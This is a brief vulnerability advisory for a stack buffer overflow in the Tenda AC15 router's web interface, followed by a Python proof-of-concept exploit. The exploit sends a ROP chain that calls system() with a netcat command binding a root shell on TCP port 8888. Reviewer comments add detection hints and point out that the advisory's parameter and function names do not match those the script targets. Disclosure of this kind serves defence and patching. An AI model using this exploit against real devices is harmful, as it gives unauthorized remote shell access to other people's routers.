Tenda AC15 has a buffer overflow

Tenda AC15 V15.03.05.18 has a stack-based buffer overflow in the deviceId parameter of the formSetDeviceName function.

Proof of concept (PoC)

import requests
from pwn import*

# Proof-of-concept request for the overflow described above, aimed at a
# device on a private lab network.
# NOTE(review): the advisory text names the deviceId parameter of
# formSetDeviceName, but this script posts devName and mac to
# /goform/SetOnlineDevName -- confirm which handler and field are affected
# before writing a detection rule or a patch check.
ip = "192.168.107.156"
cgi_name = "SetOnlineDevName"
url = "http://" + ip + "/goform/"+cgi_name
# Symbol offsets are read from a local copy of libc.so.0 (presumably
# extracted from the firmware image -- confirm).
libc = ELF("./lib/libc.so.0")
# The libc base and the stack address are hard-coded, so the request only has
# the intended effect where both are fixed, i.e. no effective address
# randomisation. NOTE(review): these look like values from an emulated or
# debug setup -- verify on real hardware before rating exploitability.
base = 0xff58c000
pop_r0_pc = 0x0003db80 + base
system = base + libc.sym['system']
stack = 0xfffef0e0
# devName carries 400 filler bytes, three 32-bit addresses and a
# NUL-terminated command string. For defenders: a devName value this long or
# containing non-printable bytes is anomalous, and the handler should bound
# the field length before copying it. The command string opens a listener on
# TCP 8888, so an unexpected listener on that port is an indicator for this
# exact PoC.
payload = "a"*400 + p32(pop_r0_pc) + p32(stack) + p32(system) + "nc -lp 8888 -e /bin/sh;\x00"

# Logs the computed address of system() for the operator.
success(hex(system))

# The POST body has only devName and mac; no cookie or credentials are
# attached. Whether the endpoint enforces authentication is not shown here --
# confirm, since it decides who can reach the vulnerable handler. Limiting
# access to the web management interface reduces exposure either way.
data = {"devName":payload, "mac":"00:0c:29:5e:66:11"}
requests.post(url, data=data)